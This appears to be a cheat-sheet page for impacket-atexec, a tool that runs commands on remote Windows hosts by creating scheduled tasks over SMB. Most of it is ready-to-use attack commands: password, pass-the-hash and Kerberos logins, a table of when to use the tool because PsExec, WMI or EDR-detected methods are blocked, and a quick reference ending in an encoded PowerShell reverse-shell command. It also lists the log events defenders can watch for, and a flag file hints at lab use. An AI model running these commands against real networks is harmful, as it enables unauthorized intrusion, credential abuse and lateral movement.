Skip to main content

Overview

impacket-atexec executes commands on a remote Windows host by creating a scheduled task via the ATSVC (Task Scheduler) named pipe. The command output is written to a temp file on the target and retrieved over SMB. Useful when other execution methods (psexec, wmiexec, smbexec) are blocked but the Task Scheduler service is still accessible.

Authentication

MethodFlagExample
Passworddomain/user:passwordCORP/admin:Password1
NTLM hash-hashes-hashes :aad3b435b51404eeaad3b435b51404ee
Kerberos-k -no-pass-k -no-pass -dc-ip 10.10.10.1

Basic Usage

Execute a command and get output: 
impacket-atexec CORP/admin:[email protected] "whoami"
Execute with IP target: 
impacket-atexec administrator:[email protected] "ipconfig /all"
Multiple commands chained: 
impacket-atexec CORP/admin:[email protected] "whoami & hostname & ipconfig"

How It Works

  1. Authenticates to the target over SMB (port 445)
  2. Connects to the ATSVC named pipe (Task Scheduler RPC interface)
  3. Creates a scheduled task set to execute immediately
  4. The task runs cmd.exe /C <command> > %windir%\Temp\<random>.tmp 2>&1
  5. Reads the output file from the ADMIN$ share (ADMIN$\Temp\<random>.tmp, i.e. C:\Windows\Temp) over SMB
  6. Deletes the output file and the scheduled task
The entire flow happens over SMB (port 445). No additional ports needed.

OPSEC

ArtifactDetails
Event 4698Scheduled task created (Security log)
Event 4702Scheduled task updated (Security log)
Event 4699Scheduled task deleted (Security log)
Event 106Task registered (Task Scheduler log)
Event 141Task removed (Task Scheduler log)
Temp fileOutput written to C:\Windows\Temp\<random>.tmp
Processcmd.exe spawned by svchost.exe (Task Scheduler)
Task name is random but follows a recognizable pattern. Detection rules commonly alert on rapid task create/delete cycles.

Pass-the-Hash

impacket-atexec -hashes :aad3b435b51404eeaad3b435b51404ee [email protected] "whoami"
Full LM:NT format: 
impacket-atexec -hashes aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee [email protected] "whoami"

Kerberos Authentication

Requires a valid TGT in the KRB5CCNAME environment variable. 
export KRB5CCNAME=/tmp/admin.ccache
impacket-atexec -k -no-pass CORP/[email protected] "whoami"
With explicit DC IP: 
impacket-atexec -k -no-pass -dc-ip 10.10.10.1 CORP/[email protected] "whoami"
Target must be specified by hostname (FQDN) when using Kerberos, not by IP.

When to Use atexec

ScenarioWhy atexec
PsExec blockedTarget blocks service creation but Task Scheduler runs
WMI blockedFirewall blocks WMI (DCOM) ports 135/49152+
SMBExec detectedEDR flags smbexec’s service creation pattern
Need single commandQuick one-off command execution without a shell
Lateral movementAlternative pivot method when standard tools fail
atexec is a single-command execution tool, not an interactive shell. For interactive access, use wmiexec or smbexec.

Quick Reference

# Password auth
impacket-atexec CORP/admin:[email protected] "whoami"

# Pass-the-hash
impacket-atexec -hashes :NT_HASH [email protected] "whoami"

# Kerberos
export KRB5CCNAME=/tmp/admin.ccache
impacket-atexec -k -no-pass CORP/[email protected] "whoami"

# Run net commands
impacket-atexec CORP/admin:[email protected] "net user /domain"

# Read a file
impacket-atexec CORP/admin:[email protected] "type C:\Users\admin\Desktop\flag.txt"

# Reverse shell (PowerShell)
impacket-atexec CORP/admin:[email protected] "powershell -e JABjAGwA..."